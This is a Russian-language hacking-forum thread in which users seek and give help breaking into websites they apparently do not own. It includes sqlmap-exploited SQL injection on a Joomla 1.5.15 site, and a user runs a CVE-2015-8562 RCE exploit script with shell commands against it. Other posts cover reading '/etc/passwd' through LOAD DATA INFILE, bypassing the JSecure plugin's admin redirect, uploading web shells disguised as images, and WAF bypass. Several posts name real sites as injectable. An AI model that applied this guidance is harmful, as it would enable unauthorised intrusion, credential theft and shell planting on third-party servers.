[00:14:33] [INFO] fetching columns for table 'fn_boleta' in database 'biman_pont

emosca'

как то можно это обойти? заранее спасибо

semik
12.04.2016, 09:29
Есть раскрученная мапом инъекция. file-priv=no. Нашел полный путь до папки аплоад. CMS - joomla 1.5.15. Прочитал хеши паролей - думал начать брутить, но путь до админки редиректит на главную страницу - как обойти пока не нашел.

Есть ли впринципе варианты загрузки шелла через инъекцию без INTO OUTFILE? Поделитесь опытом - ситуация крайне распространенная.

DezMond™
12.04.2016, 10:17
Хелп

https://www.wendweb.de/з/

ошибка в русском символе !!! AND tx_realurl_pathsegment='з' !!!

BabaDook
12.04.2016, 11:13
semik said:
↑ (https://antichat.live/posts/3972838/)
Есть раскрученная мапом инъекция. file-priv=no. Нашел полный путь до папки аплоад. CMS - joomla 1.5.15. Прочитал хеши паролей - думал начать брутить, но путь до админки редиректит на главную страницу - как обойти пока не нашел.
Если ли впринципе варианты загрузки шелла через инъекцию без INTO OUTFILE? Поделитесь опытом - ситуация крайне распространенная.


Через инъёкцияю 80% что не залить шел, есть в инете инфа что при file-priv=no можно читать, но я не сталкивался лично с этим.

админки редиректит на главную страницу - тут методы проб и ошибок , только тыкать. как вариант ноу редирект

semik
12.04.2016, 11:19
BabaDook said:
↑ (https://antichat.live/posts/3972854/)
Через инъёкцияю 80% что не залить шел, есть в инете инфа что при file-priv=no можно залить, но я не сталкивался лично с этим.
админки редиректит на главную страницу - тут методы проб и ошибок , только тыкать. как вариант ноу редирект


Спасибо, но куда тыкать =) в дампе базы посмотрел - путь до админки, вроде, штатный.


Как вариант ноу редирект


- тут не понял..


есть в инете инфа что при file-priv=no можно залить


Не кинешь ссылок - поверхностно ничего не нагуглил по этому поводу

BabaDook
12.04.2016, 11:51
Я тут обложался , возможна чтение , а не заливка

https://rdot.org/forum/showthread.php?t=741

ноу редирект, такой плагин есть для баузера, или в бурпе сделать запрос к станице и смотреть что будет

curl http://site/

Так же можно пробрутить директории папки администратор. Возможно надо идти не на интекс,

semik
12.04.2016, 12:01
BabaDook said:
↑ (https://antichat.live/posts/3972869/)
Я тут обложался , возможна чтение , а не заливка
https://rdot.org/forum/showthread.php?t=741
ноу редирект, такой плагин есть для баузера, или в бурпе сделать запрос к станице и смотреть что будет
curl
http://site/
Так же можно пробрутить директории папки администратор. Возможно надо идти не на интекс,


Благодарю за наводку. Не знаешь, в sql-shell можно выполнять запросы такого типа? "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'" или только обычные user() version()?

OxoTnik
12.04.2016, 13:39
semik said:
↑ (https://antichat.live/posts/3972871/)
Благодарю за наводку. Не знаешь, в sql-shell можно выполнять запросы такого типа? "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'" или только обычные user() version()?


можно, но при наличий прав

DezMond™
12.04.2016, 19:26
DezMond™ said:
↑ (https://antichat.live/posts/3972843/)
Хелп
https://www.wendweb.de/з/
ошибка в русском символе !!! AND tx_realurl_pathsegment='з' !!!


Не у кого нет ни каких предложений?

blackbox
13.04.2016, 01:15
OxoTnik said:
↑ (https://antichat.live/posts/3972894/)
можно, но при наличий прав


Такое по-моему работает только если есть возможность множественные запросы выполнять, разве нет?

faza02
13.04.2016, 02:17
blackbox said:
↑ (https://antichat.live/posts/3973136/)
Такое по-моему работает только если есть возможность множественные запросы выполнять, разве нет?


верно

semik
13.04.2016, 18:11
Нужна помощь:

Пытаюсь пройти по пути www.site.com/administrator/ (http://www.site.com/administrator/) в админку джумлы - редиректит на главную страницу. Предполагаю, что всему виной строка if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); } в файле /administrator/index.php. Не могу понять, какие куки ему скормить, чтобы пустило. Вычитал, что если убрать эту сроку из файла, редирект пропадет. Посоветуйте, как обойти. Есть доступ к БД на чтение через инъекцию. Предположил, что таблица jos_session как-то с этим связана. Просвятите - редко сталкивался с жумлой.

Вот пост с форума joomla-support.ru, который навел меня на эти мысли:

если вы не можете зайти в админку из-за постоянного редиректа на главную страницу, попробуйте открыть файл /administrator/index.php и там в самом начале должны быть строки на подобие этих

if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); }

удалите их и все будет ок!

t0ma5
13.04.2016, 18:17
semik said:
↑ (https://antichat.live/posts/3973314/)
Нужна помощь:
Пытаюсь пройти по пути
www.site.com/administrator/ (http://www.site.com/administrator/)
в админку джумлы - редиректит на главную страницу. Предполагаю, что всему виной строка if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); } в файле /administrator/index.php. Не могу понять, какие куки ему скормить, чтобы пустило. Вычитал, что если убрать эту сроку из файла, редирект пропадет. Посоветуйте, как обойти. Есть доступ к БД на чтение. Предположил, что таблица jos_session как-то с этим связана. Просвятите - редко сталкивался с жумлой.
Вот пост с форума joomla-support.ru, который навел меня на эти мысли:
если вы не можете зайти в админку из-за постоянного редиректа на главную страницу, попробуйте открыть файл /administrator/index.php и там в самом начале должны быть строки на подобие этих
if ($_COOKIE['JoomlaAdminSess ion'] != "1234567890") { header("Location: ../index.php"); }
удалите их и все будет ок!


файлы через скуль можно читать? если да - прочитай administrator/index.php

а так честно говоря хз, может там вообще админка переименована во что нибудь adminasd908123, а редирект где нить в .htaccess прописан

на сайте кстати формы авторизации нет? может залогинится под админом на самом сайте, а там что нибудь прояснится

.Light.
13.04.2016, 19:35
HTTP parameter pollution - с помощью этой уязвимости както можно залить шелл?

t0ma5
13.04.2016, 19:39
.Light. said:
↑ (https://antichat.live/posts/3973351/)
HTTP parameter pollution - с помощью этой уязвимости както можно залить шелл?


обход waf

http://raz0r.name/articles/http-parameter-pollution/

.Light.
13.04.2016, 19:43
t0ma5 said:
↑ (https://antichat.live/posts/3973354/)
обход waf
http://raz0r.name/articles/http-parameter-pollution/


то есть это sql ?

t0ma5
13.04.2016, 19:53
.Light. said:
↑ (https://antichat.live/posts/3973356/)
то есть это sql ?


это особенность работы бэкенда, за счет чего можно передавать данные таким способом что они будут обходить определенные проверки

рекомендую таки прочитать статью

semik
14.04.2016, 01:56
t0ma5 said:
↑ (https://antichat.live/posts/3973319/)
файлы через скуль можно читать? если да - прочитай administrator/index.php
а так честно говоря хз, может там вообще админка переименована во что нибудь adminasd908123, а редирект где нить в .htaccess прописан
на сайте кстати формы авторизации нет? может залогинится под админом на самом сайте, а там что нибудь прояснится


Файлы читать не могу. В базе джумлы разве нигде путь до админки не фиксируется?

Путь правильный - uniscan говорит файл site.com/administrator/index.php существует.

Вот содержимое файла htaccess с сайта:

##

# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $

# @package (https://antichat.live/members/206396/) Joomla

# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.

# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL

# Joomla! is Free Software

##

################################################## ###

# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE

#

# The line just below this section: 'Options +FollowSymLinks' may cause problems

# with some server configurations. It is required for use of mod_rewrite, but may already

# be set by your server administrator in a way that dissallows changing it in

# your .htaccess file. If using it causes your server to error out, comment it out (add # to

# beginning of line), reload your site in your browser and test your sef url's. If they work,

# it has been set by your server administrator and you do not need it set here.

#

################################################## ###

## Can be commented out if causes errors, see notes above.

Options +FollowSymLinks

#

# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits

## If you experience problems on your site block out the operations listed below

## This attempts to block the most common type of exploit `attempts` to Joomla!

#

## Deny access to extension xml files (uncomment out to activate)

#

#Order allow,deny

#Deny from all

#Satisfy all

#

## End of deny access to extension xml files

# Block out any script trying to set a mosConfig value through the URL

RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

# Block out any script trying to base64_encode data within the URL

RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

# Block out any script that includes a tag in URL

RewriteCond %{QUERY_STRING} (|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Return 403 Forbidden header and show the content of the root homepage

RewriteRule .* index.php [F]

#

########## End - Rewrite rules to block out some common exploits

########## Begin - Custom redirects

#

# If you need to redirect some pages, or set a canonical non-www to

# www redirect (or vice versa), place that code here. Ensure those

# redirects use the correct RewriteRule syntax and the [R=301,L] flags.

#

########## End - Custom redirects

# Uncomment following line if your webserver's URL

# is not directly related to physical file paths.

# Update Your Joomla! Directory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section

#

RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

#

# If the requested path and file is not /index.php and the request

# has not already been internally rewritten to the index.php script

RewriteCond %{REQUEST_URI} !^/index\.php

# and the request is for root, or for an extensionless URL, or the

# requested URL ends with one of the listed extensions

RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]

# and the requested path and file doesn't directly match a physical file

RewriteCond %{REQUEST_FILENAME} !-f

# and the requested path and file doesn't directly match a physical folder

RewriteCond %{REQUEST_FILENAME} !-d

# internally rewrite the request to the index.php script

RewriteRule .* index.php [L]

#

########## End - Joomla! core SEF Section

Еще вопрос: на сайте джумла 1.5.15. Версия древняя и должна быть уязвима к https://www.exploit-db.com/exploits/39033/.

python joomrce2.py -t http://www.site.com/ --cmd

[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://www.site.com/

[-] Dropping into shell-like environment to perform blind RCE

$ touch /var/полный путь к сайту из конфига БД/administrator/adm.php

$

Но результат нулевой - при попытке http://www.site.com/administrator/adm.php ошибка 404.

Опять же из базы добыл инфу, что на папку /var/полный путь к сайту из конфига БД/administrator/ установлены права drwxrwxrwx

Версию php не могу найти - видимо не подходящая для сплойта

.Light.
15.04.2016, 17:51
Warning: XSLTProcessor::transformToXml(): Cannot create XPath expression (string contains both quote and double-quotes)

SQL?

DarkCaT
15.04.2016, 18:50
.Light. said:
↑ (https://antichat.live/posts/3974142/)
Warning: XSLTProcessor::transformToXml(): Cannot create XPath expression (string contains both quote and double-quotes)
SQL?


Судя по тексту это скорее XPath инъекуция, о которой более подробоно можно почитать например на сайте OWASP или в блоге разора (ссылку прикладывать не буду, если надо сам найдешь.)

.Light.
15.04.2016, 19:40
DarkCaT said:
↑ (https://antichat.live/posts/3974167/)
Судя по тексту это скорее XPath инъекуция, о которой более подробоно можно почитать например на сайте OWASP или в блоге разора (ссылку прикладывать не буду, если надо сам найдешь.)


а есть софт под данную иньекцию?

Shubka75
15.04.2016, 19:54
.Light. said:
↑ (https://antichat.live/posts/3974193/)
а есть софт под данную иньекцию?


Скульмап нормально крутит XPATH-инъекции.

Shubka75
17.04.2016, 02:54
Инклудятся ли логи при чтении через sql инъекцию?

faza02
17.04.2016, 04:35
Shubka75 said:
↑ (https://antichat.live/posts/3974646/)
Инклудятся ли логи при чтении через sql инъекцию?


как вы себе это представляете? нет

tiger_x
20.04.2016, 18:15
скуля union(select 1,2,3) срабатывает только с +--+ ,хотя union select 1,2,3' (без скобок) работает. Почему так происходит?

LETIFERUM
20.04.2016, 18:44
нашел скрипт на одном сайте типа site.com/check.php если просто перейти по нему то выводит это:


Notice: Undefined index: login in /var/www/***/check.php on line 5


требует логина..если запрос сделать site.com/check.php?login=admin выводит:


{"id":"1","login":"Admin"} это результат JSON


могут ли быть какие варианты?пробовал типа login=admin&pass и.т.п безрезультатно

semik
21.04.2016, 14:44
Хелп.

Есть расрученная скуль. File_priv="N" Двиг: джумла 1.5.15. Есть пароль админа, но, судя по информации из таблиц о плагинах - стоит JSecure и редиректит всегда на главную. Как можно посмотреть его секретный ключ? Все таблицы облазил - не нашел. Читал, что можно глянуть в XML файле конфига JSecure, но никак не могу это сделать через "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'". Скажите, какие условия нужны для чтения файлов таким способом и как это реализуется?

powerOfthemind
21.04.2016, 16:06
Code:
http://www.gorobzor.ru/articles/sportzhizn/mir-v-ozhidanii-evro-2016-vo-francii-09-02-2016'

Вывод ошибки в title , возможно ли раскрутить? Пробовал sqlmap, без результата

tiger_x
21.04.2016, 19:02
semik said:
↑ (https://antichat.live/posts/3976148/)
Хелп.
Есть расрученная скуль. File_priv="N" Двиг: джумла 1.5.15. Есть пароль админа, но, судя по информации из таблиц о плагинах - стоит JSecure и редиректит всегда на главную. Как можно посмотреть его секретный ключ? Все таблицы облазил - не нашел. Читал, что можно глянуть в XML файле конфига JSecure, но никак не могу это сделать через "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'". Скажите, какие условия нужны для чтения файлов таким способом и как это реализуется?


Так если у тебя есть пароль админа в чем проблема? Заходи в админку joomla и заливай шелл.

semik
22.04.2016, 03:17
tiger_x said:
↑ (https://antichat.live/posts/3976255/)
Так если у тебя есть пароль админа в чем проблема? Заходи в админку joomla и заливай шелл.




стоит JSecure и редиректит всегда на главную


При вводе site.com/administrator/ редиректит на главную. Судя по всему JSecure плагин, который меняет адрес админки на site.com/administraor/?secret_key Вот этот самый секрет кей мне и нужен. Может, конечно, и htaccess жить мешает.. БД - MySql 5.1.66-log. В базе есть инфа о времени последнего входа админа - прочитать бы через скуль логи апача в это время - было бы шикарно, выявился бы линк админки, но запросам типа "LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'" выдает [WARNING] execution of custom SQL queries is only available when stacked queries are supported - уязвимый скрипт не позволяет такое выполнять.

Сервер не шаред - на айпишнике один сайт - phpmyadmin отсутствует. Все плагины уже проверил на паблик уязвимости - бесполезно Ну очень нужен шелл...

shell_c0de
22.04.2016, 06:44
если именно этот плагин попробуй поискать jos_plugins и там System - jSecure Authentication там должен быть key=твое секретное слово

semik
22.04.2016, 08:06
shell_c0de said:
↑ (https://antichat.live/posts/3976415/)
если именно этот плагин попробуй поискать jos_plugins и там System - jSecure Authentication там должен быть key=твое секретное слово


Смотрел - нету.

131 0 System - jsecure 0 system 0 jsecure 7 1 0 0000-00-00 00:00:00

Вот строка. Key параметра нет. published - 1 - значит плагин активен.

tiger_x
23.04.2016, 05:32
powerOfthemind said:
↑ (https://antichat.live/posts/3976182/)

Code:
http://www.gorobzor.ru/articles/sportzhizn/mir-v-ozhidanii-evro-2016-vo-francii-09-02-2016'

Вывод ошибки в title , возможно ли раскрутить? Пробовал sqlmap, без результата


Сайт вобще весь дырявый. Мне лично было проще раскрутить


Code:
http://www.gorobzor.ru/vibor2012/validEmail.php?Email='

Br@!ns
30.04.2016, 12:52
Есть сайт, заходя в админку не подгружает картинки и js, из-за того что коряво настроен код админки или что то намутили админы.

Тоесть пытается подгрузить данные по пути admin.site.com, которого же не существует ( существует, но при переходе на него перебрасывает на основной на главную).

При изменении исходного когда с http://admin.site.com/media... на обычный http://site.com/media... все грузит и показывает как надо.

Нужно сделать как то это автоматически, без ручного исправления кода каждый раз, какие есть варианты? с hosts не получается ничего.

faza02
30.04.2016, 13:35
Br@!ns said:
↑ (https://antichat.live/posts/3979499/)
Есть сайт, заходя в админку не подгружает картинки и js, из-за того что коряво настроен код админки или что то намутили админы.
Тоесть пытается подгрузить данные по пути admin.site.com, которого же не существует ( существует, но при переходе на него перебрасывает на основной на главную).
При изменении исходного когда с
http://admin.site.com/media
... на обычный
http://site.com/media
... все грузит и показывает как надо.
Нужно сделать как то это автоматически, без ручного исправления кода каждый раз, какие есть варианты? с hosts не получается ничего.


например так:

http://savepic.ru/9556558.png

а почему с hosts не выходит?

Br@!ns
30.04.2016, 13:45
yarbabin said:
↑ (https://antichat.live/posts/3979518/)
например так:
http://savepic.ru/9556558.png
а почему с hosts не выходит?


Просто неработает, непонятно. мб потому как при заходе на ип адрес сайт не открывает.

А что за плагин такой?

faza02
30.04.2016, 14:06
Br@!ns said:
↑ (https://antichat.live/posts/3979520/)
Просто неработает, непонятно. мб потому как при заходе на ип адрес сайт не открывает.
А что за плагин такой?


burp suite же

Br@!ns
30.04.2016, 14:30
может плагин какой есть для фф под это дело? с burp suite непоулчается

Octavian
02.05.2016, 22:10
Заливаю шел через картинку пропускает но сохраняет под имени file. точка в конец как обоити ? + пишет Невозможно получить длину и ширину изображения

Br@!ns
14.08.2016, 13:50
Неподскажите, можно ли через phpmyadmin коннектиться к произвольному серверу, как в админере? без дополнительных настроек в /setup/ ?